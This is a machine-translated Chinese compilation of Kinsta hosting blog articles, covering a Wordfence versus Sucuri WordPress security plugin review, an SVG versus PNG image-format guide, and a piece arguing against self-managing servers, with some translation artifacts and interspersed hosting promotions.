免费用户只有在上线 30 天后才能获得关键任务更新。他们也不会得到实时的 IP 黑名单。虽然这对于个人网站来说似乎是一个不错的选择,但如果你是一个企业或电子商务网站,这可能会成为一个障碍。
与云防火墙相比,端点防火墙有一个优势。由于它完全由你的服务器供电,理论上它不能泄露任何数据,也不能被绕过。相比之下,云防火墙可能会泄露数据,或者被绕过,如果攻击者知道你的服务器的 IP 地址。
Cloud Firewall vs Endpoint Firewall (Image source: Wordfence)
可用的安全设置和功能
Wordfence 位于您的 web 服务器上。因此,你可以在你的 WordPress 仪表盘中找到它的所有设置。
仪表板干净整洁,信息丰富。它为您提供关键信息和警告,一目了然。
The Wordfence dashboard
Wordfence 的扫描程序会对服务器上的每个文件进行完整性检查。如果它不是核心 WordPress 文件或官方主题/插件,它会提醒你。
你的新网站需要一流的、快速的、安全的主机吗?Kinsta 提供超快的服务器和来自 WordPress 专家的 24/7 世界级支持。查看我们的计划
它会将服务器文件中的文本与已知恶意软件的文本进行匹配。如果它发现任何类似的东西,即使只是一两行,它也会发出警告。如果你的主题或插件有更新,你也会收到通知。
现在,让我们转到 Wordfence 的防火墙面板。在这里,您可以管理 Wordfence 的 WAF 设置并优化其配置。
Wordfence’s Firewall settings are mostly automated
当你第一次安装 Wordfence 的时候,默认情况下它的 WAF 会处于学习模式一周。这允许它彻底研究你的站点和访问者,所以它知道应用什么规则来只让合法的流量通过防火墙。
实时 IP 黑名单功能仅适用于高级用户。
启用暴力保护后,Wordfence 会在几次不成功的密码猜测尝试后锁定他们的帐户,从而保护您免受攻击者的攻击。如果它认为密码太弱,不容易猜到,它还会强迫你更改密码。
Manage blocking rules for your site from the Blocking tab
在拦截选项卡下,您可以根据 IP 地址、IP 范围、浏览器、主机名和推荐人拦截流量。然而,国家级封锁是一个只有高级功能。您可以组合所有不同的封锁规则,并将其保存为封锁类型。
Activate rate limiting and advanced blocking rules from here
在防火墙选项部分,您可以将 IP 地址和服务列入白名单,设置 WAF 警报要忽略的 IP 地址,配置速率限制,以及将 URL 列入白名单。
Wordfence 还允许您阻止访问某些 URL 的 IP。如果有人反复探查您的网站的已知漏洞,这将很有帮助。
接下来,让我们转到扫描仪设置选项卡。
Manage your Wordfence scan settings from here
在这里,你会发现 Wordfence 的扫描任务。前三个测试是检查垃圾邮件和黑名单,它们只为高级用户保留。
如果扫描发现任何异常,它会给你一个警告。
在扫描选项和调度部分,您可以设置扫描灵敏度、扫描频率和白名单文件。您也可以在您的设置中优化扫描性能。
Wordfence has extensive scan and scheduling options
Wordfence 附带了一堆其他方便的工具。
实时流量工具可以帮助你实时查看网站上发生的事情。您可以仅通过与安全相关的流量对其进行过滤。这将显示所有用户登录,黑客企图,和恶意请求。
Live Traffic is Wordfence’s coolest yet resource-intensive feature
虽然这是一个很酷的功能,但实时流量会占用大量服务器资源。我建议你不用的时候关掉它。
其他工具包括 Whois 查找、导入/导出选项和诊断。
你也可以使用 Wordfence 的登录安全模块为你的 WordPress 站点上的所有登录启用双因素认证(2FA) 。它以前是一个只有高级用户才能使用的功能,但现在它是免费的。
Enable Two-Factor Authentication on your site easily
你可以使用 Google Authenticator、FreeOTP 或 Authy (我个人推荐)等免费手机应用来设置 2FA。
Wordfence’s Login Security Settings tab
您可以为所有用户角色启用 2FA。这是保护您自己和您的用户免受暴力攻击(如密码猜测和凭据填充)的好方法。
您可以为 2FA 设置一个 IP 白名单,以便某些 IP 在登录时不必经过额外的安全检查。如果您主要在一个地方工作,这个特性可以帮助您避免每次登录都要经过 2FA。
阻止暴力攻击的其他登录安全功能包括:
- 限制“忘记密码”尝试和登录失败的次数。经过一定次数的尝试后,用户将被锁定。
- 强制实施站点范围的强密码。
- 防止用户注册某些用户名(如 admin)
- 立即阻止试图使用特定用户名(如 admin、yoursite_admin 等)登录的人。).
- 禁用 XML-RPC 身份验证,这是一种用于注入恶意软件的常见攻击媒介。
最后,Wordfence 包括一个 All Options 面板,在这里你可以找到每一个 Wordfence 设置。考虑到 Wordfence 下的广泛选项,这是非常有用的。
View all of Wordfence’s options from the All Options panel
易用性
关于用户友好性,Wordfence 可以与 Sucuri Security 相媲美,并且使用起来超级简单。安装并激活插件后,Wordfence 会立即进入学习模式一周。
根据您的服务器设置和流量,它会自动应用推荐的防火墙和扫描设置。根据我的经验,这些设置足以保护您免受大多数攻击。
登录安全特性易于设置和实施。
如果你的网站受到 DDoS 攻击,Wordfence 可以让你的服务器爬行。在最极端的情况下,服务器可能会不堪重负,以至于它会锁定你访问你的 WordPress 管理仪表板。
由于 Wordfence 是一个本地化的解决方案,您可以完全控制它的设置。如果你精通技术,这可能会有所帮助,但对于大多数 WordPress 用户来说,这可能是一个麻烦。
总的来说,我发现 Wordfence 非常简单,只要它能按预期工作。
Wordfence 在网络安全上表现如何
预防
不像 Sucuri 的免费解决方案不包括防火墙,Wordfence 有一些牙齿来阻止大多数攻击。它不仅应用了标准的安全强化措施,而且还带有服务器端 WAF。
但是最新的威胁更新只提供给高级用户。免费用户在上线 30 天后获得更新。由于你的网络服务器支持 Wordfence(而不是云),即使有了 premium 选项,你也只能自己防御 DDoS 攻击。
我可以理解这一决定背后的业务需求,但为了安全起见,我认为 Sucuri 的全有或全无的方法更好。至少你不会认为你已经受到了保护,可以抵御最常见的威胁,而实际上你并没有。
也就是说,Wordfence 的高级版本在防止大多数安全攻击方面做得很好。他们的博客和 YouTube 频道是让你了解最新 WordPress 安全威胁的绝佳资源。
侦查
免费的 Wordfence 插件可以很好地检测大多数安全问题。但是你需要它的高级包来嗅出最新的威胁。
如果一个黑客成功地把你锁在了你的网站之外,那么就没有办法像 Sucuri 那样审计日志了。因此,调查黑客行为要困难得多。
除了联系你的主机提供商或第三方安全服务,你没有其他的办法,讽刺的是,这也包括 Wordfence。
与 Sucuri 相比,Wordfence 有一个基本的警报定制功能,它做得很好。一旦发现安全异常,它会及时提醒你。
响应和恢复
如前所述,免费版的 Wordfence 让你自己照顾自己。但即使有了高级包,Wordfence 也不提供任何响应和恢复服务。
这里有一段话直接摘自 Wordfence 的使用条款:
“我们为 Wordfence Premium 提供的支持仅限于每个事件 2 小时的支持。我们保留拒绝进一步支持或对超过 2 小时的额外支持收费的权利。”
要获得完整的解决方案,你必须去找他们独立的叫做 WordPress 网站清理的服务。它的定价是每个实例 179 美元(加上基于需求的激增费用)。
Wordfence WordPress site cleaning service
他们的 WordPress 网站清理服务包括:
- 通过删除所有恶意代码和链接来清除受感染的站点。
- 调查网站是如何被感染的。
- 提供调查和感染清除的深入报告。
- 申请将该站点从反恶意软件和反垃圾邮件黑名单中删除。
- 提供一份清单,以避免未来的攻击。
我还没用过他们的场地清理服务,不过好像够全面了。以下是我在 Twitter 上找到的一些好评:
Dr. David Miles, Editor-in-Chief, Global Politics
Rachel Bustin, Family Lifestyle Blogger
与 Sucuri 的恶意软件清除和黑客清理服务(包含在高级 Sucuri 平台中)相比,Wordfence 的网站清理服务似乎更昂贵。
使用 Sucuri,你可以在订阅期内无限制地清除恶意软件,而 Wordfence 的恶意软件清除服务只针对一项工作。如果几个月后你的网站再次感染了恶意软件,你需要再次支付相同的费用来清除。
信息
Kinsta 向所有计划的所有用户提供安全保证。
文字围栏定价
你可以免费下载 Wordfence 的安全插件。到目前为止,它是 WordPress 插件库中评价最高、安装最多的安全插件。
Wordfence Premium 个站点的起价为 99 美元/年。如果你在订单上添加额外的网站,你会得到折扣。添加的站点越多,折扣越大!
Wordfence Premium Pricing
安全插件如何影响网站性能
WordPress 插件不仅是最大的安全隐患,也是的主要性能杀手之一。安全插件尤其是罪魁祸首,这要归功于它们永远在线的需求和扫描功能。
然而,如果你需要额外的保护,特别是如果你面对机器人和代理流量,基于云的安全解决方案,如 Sucuri 防火墙或 Cloudflare 是非常好的。
总结
苏库里 vs Wordfence。最好的选择是什么?
一方面,Sucuri 是 web 安全性和性能两者中更好的解决方案,尤其是如果你正在运行一个关键业务或电子商务网站。
但是,如果你正在寻找一个免费的网络防火墙,Wordfence 是一个更坚固的解决方案。如果这是你的选择,我建议将其与可靠的免费 CDN 配对,如 Cloudflare 。
在一天结束时,这一切都归结于你的主机。一个优秀的主机提供商会为你负责大部分的安全措施。他们明白,第三方插件给他们的服务器和服务带来的性能影响是不值得争论的。
理想情况下,您的主机应该锁定代码,使其只能在有限的位置和实例中执行。然后限制只将上载写入代码的相应文件夹。在服务器层面增加一些安全加固措施,这将使 WordPress 安全插件变得多余。
最终,网站安全是一个旅程,而不是目的地。我建议你走最好的道路前进!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。*
SVG 和 PNG:有什么区别,什么时候使用它们
有几十种图像文件类型,每一种都因压缩类型、格式和浏览器支持而异。但是最常用的两种格式是 SVG 和 PNG。
这两种文件类型有天壤之别,每一种都更适合特定的情况。它们当然不能在每个方面互换,但是您可能会发现 SVG 比标准的 PNG 图像能更好地执行特定的任务。
了解 SVG 和 PNG 的区别,以及它们在网站上的最佳应用。
查看我们的视频指南到 SVG vs PNG
What Is SVG?
SVG 代表可缩放矢量图形,它是网络上使用最广泛的矢量文件格式。让我们来分解一下:
- 可缩放:SVG 可以在不损害图像质量的情况下上下调整大小。无论它有多大或多小,它都会非常清脆和清晰。
- 矢量:大多数图像文件类型都包含像素。向量本质上是实时渲染图像的代码片段,将图像转换为您在屏幕上看到的像素。虽然它们显示相同的图像,但背景中的内容却大不相同。
- 图形:虽然 SVG 可能不太为人所知,但它是一种类似 PNG、JPEG 或 GIF 的图像文件类型。它只是处理事情的方式有点不同。
向量是用 XML 编写的代码片段,表示形状、线条和颜色,以阐述其工作原理。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
虽然只用代码创建图像是完全可能的,但大多数人使用的是矢量图形编辑器,如 Inkscape 或 Adobe Illustrator。你也可以将 png或其他光栅图像转换成 SVG,但是结果并不总是很好。
Convertio is a PNG to SVG converter.
当页面加载时,这些代码被转换成图形,所以您不能立即区分 SVG 和 PNG。但是因为 SVG 只是转换成像素的代码行,这意味着它们可以缩放到任何分辨率——大或小— ,而不会损失质量。
Example of an enlarged SVG.
SVG 还支持动画和透明度,使其成为一种通用的文件格式。
唯一的问题是,它不像 PNG 这样的标准格式那样被广泛使用,所以它在旧的浏览器和设备上不太受支持,而且将它上传到您的网站并让它正确显示并不总是最容易的。
想知道 SVG 文件和 png 有什么不同?🤔本指南旨在为您提供帮助💪 点击推文
SVG 的利与弊
尽管仍没有像 PNG 这样的光栅文件类型那样广泛使用,但矢量图形的流行程度正在快速增长。它们完成一些光栅图像无法完成的重要任务。这就是人们喜欢 SVG 的原因。
- SVG 图像是可缩放的。你可以以任何分辨率设计它,它会在不损害质量或像素化的情况下放大或缩小。对于光栅图像,你需要从一开始就知道你想要什么样的尺寸,否则你可能会使图像过大或过小。
- SVG 总是看起来清晰而美丽,因为从来没有经历过质量损失。即使稍微调整大小,光栅图像也会开始看起来模糊。
- 由于 SVG 只是代码,它们的文件大小是最小的并且经过了很好的优化。SVG 优化器的存在使得它们更易于管理。如果你使用它们,你的网站可能会加载得更快一些。
- 与 png 不同,SVG 支持动画。
SVG 比 PNG 好很多,从可伸缩到更小,但并不是在所有情况下都更好。这是矢量文件类型的缺点。
- 虽然 SVG 在所有主流的现代浏览器上都受到支持,但是在旧的浏览器和设备上呈现它们会遇到兼容性问题。如果你的访问者中有相当一部分使用这些,转换可能是一个坏主意。
- SVG 更难处理,需要特殊的程序来创建和编辑。虽然您可以只用 XML 来设计它们,但这并不总是可行的。像 Adobe Illustrator 这样的高级工具可能很贵。
- SVG 不像 png 那样容易嵌入。如果你使用 WordPress,默认的媒体库不支持它,所以你需要一个插件来上传它们。
- SVG 必须在页面加载时由浏览器呈现,因此使用过多的 SVG 或包含许多向量的大文件会加重设备的负担。
何时在 PNG 上使用 SVG
虽然您绝对不应该将所有的 png 转换为 SVG,但是矢量图形可以很好地替代某些图像。
SVG 图像特别适用于装饰性的网站图形、徽标、图标、图形和图表以及其他简单的图像。参见我们的主页上一个很好的矢量艺术作品的例子。
The Kinsta homepage.
然而,它们不能很好地处理涉及许多颜色和形状的复杂图像,如截图、摄影,甚至详细的艺术作品。虽然可以将任何图像转换为 SVG,但浏览器并不总是能很好地处理具有数百种颜色的复杂矢量,因为它们必须在页面加载时呈现。
此外,SVG 作品可能很漂亮,但是设计复杂的图像需要大量的时间、精力和对高级编辑工具的熟练程度。如果你想创建矢量图像,保持简单。
如果你有详细的图片,一定要坚持使用 PNG。
然而,由于 SVG 的可伸缩性和没有质量下降,它们更适合于响应性和 retina 就绪的 web 设计。此外,它们支持动画,而 PNG 不支持,支持动画的光栅文件类型如 GIF、APNG 和 WebP 都有它们的问题。
对于可能需要动画并且保证在任何屏幕尺寸上缩放良好的简单图形,请使用 SVG。
什么是 PNG?
PNG 代表可移植网络图形,这个名称反映在这种文件类型的广泛程度上。任何使用过电脑的人都可能使用过 png,因为它是互联网上仅次于 JPEG 的最常见的文件类型。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
PNG 是一种光栅图像文件类型,类似于大多数常见的图像格式。这意味着它由像素组成,即显示在你的显示器或屏幕上的相同的小点。虽然这使其易于显示,但也意味着图像质量取决于分辨率,即图像中有多少像素。
因此,如果您放大或缩小光栅图像,质量将会受到影响。有时,这种损害可以忽略不计,尤其是在缩小时,有时它会使图像模糊不清,完全无法使用。
Example of an enlarged PNG.
尽管如此,PNG 的流行使其成为通用用途的良好候选。这种文件类型支持透明,但不支持动画。
巴布亚新几内亚的利弊
是什么让 PNG 成为网上最广泛使用的图像文件格式?以下是优点:
- PNG 文件可以在任何常见的图像编辑工具中轻松编辑和打开。创建或更改 PNG 图像无需支付高级程序费用;最多可能需要下载一个 GIMP 这样的免费编辑器。
- 无论你是从头开始编码还是使用 WordPress 媒体管理器,在你的网站上显示 PNG 图像都是一项简单的任务。
- PNG 使用无损压缩,这使得它看起来比有损压缩JPEG 更清晰。然而,这样做的代价是更大的文件大小,而且无法与矢量图像相比。
另一方面,PNG 格式是几十年前创建的,有几个明显的缺陷,这些缺陷还没有针对现代时代进行更新。
- 您无法在不降低质量的情况下调整 PNG 文件的大小。在设计光栅图形时,你需要仔细计划,并确保它的大小正确,否则你可能会浪费时间制作无用的图像。
- 由于无损压缩,png 非常大。因此,他们可以减缓你的网站。解决这个问题需要进一步压缩,这会损害质量。
- 用 PNGs 制作“视网膜就绪”的图像更加繁琐,也更容易造成模糊。
- PNG 不支持动画。其他动画光栅文件类型,如 gif,可能会有严重的问题;例如,gif 的质量非常低,只支持 256 色。
何时在 SVG 上使用 PNG
PNG 是最常见的文件类型,这是有原因的;它非常通用,几乎适合任何情况。在使用它时,需要考虑一些缺陷,比如它们的文件太大,缺乏可伸缩性。
需要一个给你带来竞争优势的托管解决方案吗?Kinsta 为您提供了令人难以置信的速度、一流的安全性和自动伸缩功能。查看我们的计划
png 适用于显示详细的图像、艺术作品和照片——矢量图像无法处理的所有内容。任何具有数百种颜色和高分辨率的文件都应该是 PNG 文件。
这并不是说你不能使用 png 来制作更简单的图像,比如徽标和装饰性图形,但是 SVG 更适合这项任务。
当你不确定一个平台是否能处理更新的、不太受支持的 SVG 文件类型时,PNG 是一个不错的选择——如果安全的话。
例如,你不能将 SVG 上传到大多数社交媒体上。由于一些电子邮件客户端可能会与矢量进行斗争,所以通常建议在电子邮件模板中坚持使用 png。
一般来说,png 可以很好地处理任何复杂的非动画图像,尤其是那些需要透明的图像。你几乎可以在任何地方使用它;只是有时候 SVG 会更适合。
请记住,如果您的 SVG 加载失败,您总是可以使用 PNG 回退,因此使用 vectors 通常是安全的,即使您的用户群中有很大一部分仍然使用旧设备或浏览器。
SVG 和 PNG 哪个最好?
没有哪种文件类型比另一种更好或更差;每一种都有其局限性。虽然 SVG 在几个方面优于 PNG,但是 PNG 在处理某些事情上要好得多。
不过,一般来说,只要合适,就应该坚持使用 SVG,而在 vectors 不能处理的所有其他情况下使用 png。在这些情况下,您可能在技术上能够使用其中任何一种,但是在一些特定的领域,SVG 是更可取的。
SVG 支持动画,而 PNG 不支持。像 GIF 和 APNG 这样的光栅文件类型也可以考虑。尽管如此,仍然没有一种完美的动画光栅格式被广泛支持、广为人知、高质量,并且文件很小。SVG 满足了所有这些需求。
SVG 还可以完美地缩放到任何屏幕尺寸,这使得它们在默认情况下反应灵敏,并且支持 retina。png 在调整大小时会失去质量,并且让它们很好地缩放是一件麻烦的事情——特别是如果你只有很小的图像,在大屏幕上显示不好。
最后,SVG 通常比 png 小,所以尽管需要在加载时渲染,但它们对服务器的负担较轻。
在你的网站上用它们来制作简单的、平面的艺术作品、标志和装饰图形。
另一方面,png 适用于以大分辨率显示复杂的图形,或者具有成千上万种颜色的图片。SVG 目前无法处理如此多的颜色和形状。
这些复杂的图片通常会构成你网站上的大部分图片,所以现在还不是抛弃 PNG 的时候。
png 在浏览器和特定平台上得到更广泛的支持,比如电子邮件客户端。如果您不确定 SVG 是否能够正确呈现,请谨慎使用 PNG。
SVG 和 png 听起来可能相似,但这两种流行的文件类型适合特定的情况。🤷♀️了解更多就在这里⬇️ 点击推文
摘要
SVG 和 PNG 是两种非常不同的文件格式。最后,在非常特殊的用例之外,在站点上使用 PNG 还是 JPEGs 并不是什么大不了的事情,但是在 SVG 和 PNG 之间做出选择是一个更重要的选择。
您更有可能使用 png,因为它是一种更简单、更容易访问、更通用的文件格式。复杂的图像如截图和详细的插图应该使用 PNG。
虽然 SVG 更难创建和编辑,但它们比 png 有许多优点。只要适合使用矢量图像,比如装饰图形和徽标,就一定要使用 SVG。
您不太可能将网站上的每一张图片都换成 SVG,但是它们的响应速度和较小的文件大小使它们在某些情况下成为很好的候选对象。
你是 SVG 还是 PNG 帮?请在下面的评论中与我们的社区分享您的观点!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
为什么试图成为一名系统管理员来节省每月 20 美元不是一个好主意
一次又一次,我们在论坛和社交媒体上看到用户抱怨托管 WordPress 主机是对金钱的巨大浪费。他们的理由?管理自己的服务器会好很多。不幸的是,他们从来没有提到这一切实际上意味着什么。对于一个不经意的 WordPress 用户来说,这肯定会给人错误的印象。这听起来很容易,也很便宜,但最终的结果是你可能会花费比你想象的更多的时间和金钱。
你可能会想,“你们这些家伙是一个应用、数据库、管理 WordPress 托管公司,这样不就有点偏心了吗?”也许吧,但我们也有优势,能看到双方的视角。
我们在 Kinsta 团队中有系统管理员,他们为客户管理我们自己的所有服务器,因此,我们知道如何正确地做这件事,以及为什么对你们大多数人来说,成为系统管理员实际上是一个坏主意。事实上,在某些情况下,这可能是一场彻头彻尾的噩梦。作为一名系统管理员需要很大的耐心和技巧,而且你必须真正喜欢修复坏掉的东西!
Sysadmin meme (Image source: quickmeme)
除了我们自己的团队之外,我们还可以看到来自客户的所有反馈,这些客户以前试图自己管理一切。一旦他们到达像金斯塔这样的主机,答案几乎总是,“它值得每一分钱。”
如果你正在考虑是管理你自己的服务器(作为一名系统管理员)还是去找一个主机提供商,这篇文章是为你准备的!下面我们将深入探讨所有的优点和缺点。是的,两边都有好有坏。
什么是系统管理员?
系统管理员(sysadmin)是负责配置、更新和保持服务器运行的人员。我们在 Kinsta 的系统管理员全天候在幕后工作,以确保一切顺利运行。当一台服务器停机时,系统管理员的工作就是查找故障原因并使其恢复运行。
Support
任何人在某种程度上都可以是系统管理员。这并不一定意味着他们是一个好的或应该这样做。😉但是,如果一个人负责管理他们的站点所在的服务器,那么很可能他是在做系统管理员的工作。我们将在下面详细介绍通常伴随而来的所有责任。
作为系统管理员的优势
很快,你可能会说我们对这个话题有很强烈的看法。但是不要误解我们,成为一名系统管理员并不全是坏事。事实上,它肯定比使用托管 WordPress 主机有一些优势。
然而,这肯定需要某种心态和个人来做好这一点。我们所说的“好”是指,不要因为花费比实际工作更多的时间来修复和排除故障而造成损失。无论你是企业主、WordPress 开发者,还是代理,你都应该问问自己;你应该花时间做的最重要的任务是什么?你有能力成为一名系统管理员吗?
T3】
1.准系统/VPS 非常便宜
成为自己的系统管理员的第一个原因是,大多数准系统和虚拟专用服务器(VPS)的原始成本实际上非常便宜!如果你有能力和技术专长,你肯定能省下一些钱。
例如,如果你看一看来自 Linode、Digital Ocean 或 Vultr 的 VPS,这些起价低至 5 美元/月。这甚至比大多数共享主机提供商更便宜。有些甚至提供基于所用资源的现收现付计划。
Digital Ocean prices
这里的警告是,这些机器不只是即插即用。你只是在为 CPU、RAM、磁盘等付费。虽然他们中的许多人都有一键式应用程序,但其他一切都由你负责。您可以尝试使用 ServerPilot 之类的工具来简化这一过程,但这并不能在您最需要的时候为您提供全天候支持。这是为什么这种方式通常被称为 DIY 托管的原因。
2.你可以安装任何你想安装的东西
显然,成为你自己的系统管理员的最大好处之一就是你可以完全控制所有的事情。你可以在你的服务器上安装和运行任何你想要的东西。需要安装像 Ioncube 这样的软件包或 PHP 扩展吗?你不必担心询问支持团队会降低速度,你可以简单地将 SSH到你的服务器中,然后自己安装。
3.您将获得完全的根用户访问权限
与上面相关的是,有些东西需要 root 权限才能安装在服务器上。当使用托管 WordPress 主机时,你通常不会获得 root 访问权限。为什么?因为他们不能冒你弄坏东西的风险。一个错误的命令就可能导致服务器停机。Root 访问是一把“双刃剑”然而,如果你有技能,那么拥有完全根权限的就派上用场了。仅仅这个原因有时就是用户选择管理自己的服务器的原因。
4.有可能实现令人敬畏的性能
另一个优势是,如果配置得当(通常这需要大量的工作和知识),您可以在管理自己的服务器时获得惊人的性能。这是因为准系统资源通常相当便宜,而且由于你管理一切,你可以确保没有资源被任何其他站点共享。事实上,很多网站用户倾向于购买比他们网站实际使用的更多的资源。
T3】
作为系统管理员的缺点
现在是时候深入了解作为一名系统管理员的许多缺点了。是的,正如你可能猜到的,缺点比优点多得多。但这也是系统管理员的工作如此重要的原因。你只要问自己,那个人应该是你吗?
我们还将向您展示,在 Kinsta,您可以不费吹灰之力完成每一项任务。
1.服务器的设置和配置完全是你的责任
每当你需要一个新的服务器,设置它完全是你的责任。如果您使用的是准系统机器或 VPS 提供商,这通常意味着启动一台新机器。所以你最好知道根据你的流量,你的站点需要多少内存、CPU 和 PHP 工作人员。您还必须知道数据库的内存需求( InnoDB 缓冲池)、系统内存需求、php-fpm worker 需求等。).
在它运行之后,您必须对它进行配置。根据您的需求,这可能包括各种任务,例如:
- 分配 IP 地址
- 设置 DNS 记录
- 安装 Nginx/Apache(看看我们的 web 服务器对决: Nginx vs Apache )
- 安装 PHP
- 安装软件包,如 Node 或 Yarn
- 安装 PHP 扩展,如 Ioncube 或 Recode
- 更新至最新版本的 MySQL 或 MariaDB
如果你使用的是准系统,安装(和升级)和配置 WordPress 所需的所有服务可能需要几天时间。如果你使用自动安装程序,你仍然不知道如何保持机器更新或安全。MySQL 和 php-fpm 设置也是如此。确切地知道要改变什么,改变到什么值,可以使白天和黑夜有所不同。
许多人没有意识到幕后发生的一切。在 Kinsta,我们定制编译了一堆 Linux 包以获得最佳性能。这几乎不可能靠你自己来完成,因此你会从一开始就失去性能。我们的 Nginx 规则集是基于我们运行数万个高流量 WordPress 网站的经验而构建的。这些规则集包括从安全性到性能调整的所有内容。
我们也有超过 30 个不同的软件包和 PHP 扩展,通常由客户使用。对于那些可能不熟悉安装服务器端软件的人来说,这些通常不只是一键安装程序。为了给你一个更好的印象,下面是如果你自己安装 Ioncube (PHP 扩展)的典型步骤:
- 将 Ioncube 下载并解压缩到服务器
- 将文件复制到 PHP 目录中
- 编辑 php.ini 文件
- 测试并重新加载 Nginx
- 重启当前的 PHP 引擎
- 检查日志,清除缓存等。
换句话说,如果您正在管理自己的服务器,请确保在需要时留出一些时间来配置新的服务器。之后,你仍然需要安装和设置你的 WordPress 网站。
在 Kinsta 推出新网站
如果你使用一个应用程序、数据库和托管的 WordPress 主机,比如 Kinsta,你不需要在服务器上配置任何东西。您可以随时启动新网站。只需登录 MyKinsta 仪表盘,点击“添加一个站点”你最大的任务就是从我们为你提供的 35 个不同的数据中心位置中进行战略选择。
Launch new site at Kinsta
需要安装像 Ioncube 这样的新软件包或 PHP 扩展吗?很可能它已经在 Kinsta 的服务器上运行了。但是如果没有,你可以通过点击仪表板上的一个按钮轻松地启用它。
2.你必须做好备份
当您管理自己的服务器时,您很可能需要自己的备份解决方案。一些提供商可能会为此提供额外的服务,但通常并不完美。例如,如果你正在使用数字海洋水滴,他们只提供你的机器每周的快照。他们还增加了 20%的成本。任何人都会同意,每周备份远远不够。
这还只是服务器备份。很可能你也想为你的 WordPress 站点本身配置一个单独的异地备份解决方案,特别是当你在一个服务器上有多个站点的时候。因此,这可能会导致解决方案和存储它们的磁盘空间的额外成本。看看几个推荐的 WordPress 增量备份插件。
T3】
Kinsta 的备份工作方式
Kinsta 的备份再简单不过了!在服务器级别,我们在 24 小时内每隔 4 小时为基础架构中的每台机器创建并存储永久磁盘快照,然后在两周内每隔 24 小时创建并存储一次。Google Cloud Platform 通过自动校验和自动在多个位置冗余存储每个快照的多个副本,以确保数据的完整性。
这意味着快照存储在与其最初创建位置不同的数据中心。如果我们的谷歌云平台基础设施受到影响,我们总会有快照需要恢复。
然后,当涉及到您的站点时,Kinsta 提供自动每日备份、可下载备份、手动备份还原点,甚至系统生成备份,即在特定事件期间创建的自动系统备份。如果这还不够,我们还有一个每小时备份插件,您可以购买它来创建每小时或每 6 小时的备份。备份存储在永久磁盘快照中(在多个位置)。
正因为如此,如果你用 Kinsta 做主机,就不需要备份插件了。🤘您可以通过单击一个按钮来恢复备份,甚至可以将它们复制到您的暂存环境中。更好的是,Kinsta 不把你的备份包括在你的总磁盘空间使用量中。
WordPress backups
3.锁定你的服务器和 WordPress 网站取决于你自己
当您管理您的服务器时,锁定它们由您决定。Linux 加固,一般来说,需要多年的经验。
如果恶意代码进入您的网络,或者有人发起暴力攻击,您将对此负责。然后还有 DDoS 攻击可以在几分钟内让你的服务器离线。相信我们, DDoS 攻击总是在最糟糕的时候到来。你最好知道如何识别源头并阻止它。
保护您的服务器和 WordPress 站点包括各种不同的任务,例如:
- 实施硬件和软件防火墙(从服务器级软件到 web 应用防火墙,如 Cloudflare 或 Sucuri)。
- 安装恶意软件扫描软件。这通常需要 Linux 和 WordPress。
- 修补 Nginx/Apache 或用安全更新更新 PHP。
- 收紧服务器上的文件/文件夹限制。
- 清理被黑的 WordPress 网站(你永远无法 100%保护 WordPress,它所需要的只是一个坏插件)。
WordPress 很棒,但是今年是我们见过的插件漏洞最严重的一年。你最好确保你知道如何正确地清理 WordPress 网站上的恶意软件。我们一次又一次地听到用户自己尝试这样做,并为此奋斗了几天!
以下是我们金斯塔团队最近不得不处理的几起事件:
- 供应商后门&pip dig 电源包中的可疑代码
- XSS 和 RCE 社交战插件中的漏洞和攻击数据
- 未经授权调用 Yuzo 相关帖子插件中的任何动作
- 黄色铅笔视觉主题定制器中的零日漏洞
- 重复页面 WordPress 插件中的 SQL 注入
- WP 谷歌地图插件中未经认证的 SQL 注入
请务必阅读我们关于 SQL 注入的深度指南。
一些 VPS 提供商,如 Digital Ocean,提供云防火墙。但是实现它们仍然取决于您,例如,您需要知道端口上的哪些入站规则,哪些 IP 地址应该被列入黑名单或白名单,等等。
Sysadmin security (Image source: Reddit)
晚上在金斯塔的诺克斯堡像安全一样高枕无忧
你真的想把周末花在抵御黑客或阻止 DDoS 攻击上吗?你知道怎么做吗?这就是为什么除非你在安全方面有很强的技术能力,否则你迟早会遇到严重的安全问题。
如果你有一个应用程序、数据库和托管的 WordPress 主机,比如 Kinsta,我们会为你处理所有这些。这里只是我们在所有托管计划中提供的一些安全特性。
-
Kinsta 检测 DDoS 攻击,监控正常运行时间,自动封禁一分钟内登录失败次数超过 6 次的 IP。
-
当直接访问你的 WordPress 站点时,只支持加密的 SFTP 和 SSH 连接(不支持 FTP)(这里是 FTP 和 SFTP 的区别)。
-
硬件防火墙以及额外的主动和被动安全措施可以防止对您数据的访问。
-
我们对前端请求隐藏了你正在使用的 WordPress 和 PHP 版本。我们的 open_basedir 限制也不允许在容易受到恶意脚本攻击的公共目录中执行 PHP。
-
Kinsta uses Linux containers (LXC) on top of Google Cloud Platform (GCP) which provides complete isolation for not just each account, but each separate site. This is a much more secure method than offered by other competitors. GCP also employs data encryption at rest.
金斯塔主持架构。
-
Kinsta 利用谷歌云平台的高级层网络和企业级防火墙。我们的防火墙配置允许我们在恶意流量进入我们的虚拟机网络之前将其拦截。与 GCP 的标准层网络相比,高级层通过谷歌快速安全的专用网络传输更多流量。
-
Kinsta 只运行支持的 PHP 版本:7.2、 7.3 和 7.4 (不包括淘汰时间)。不受支持的 PHP 版本是危险的,因为它们不再有安全更新,并暴露于未打补丁的安全漏洞。
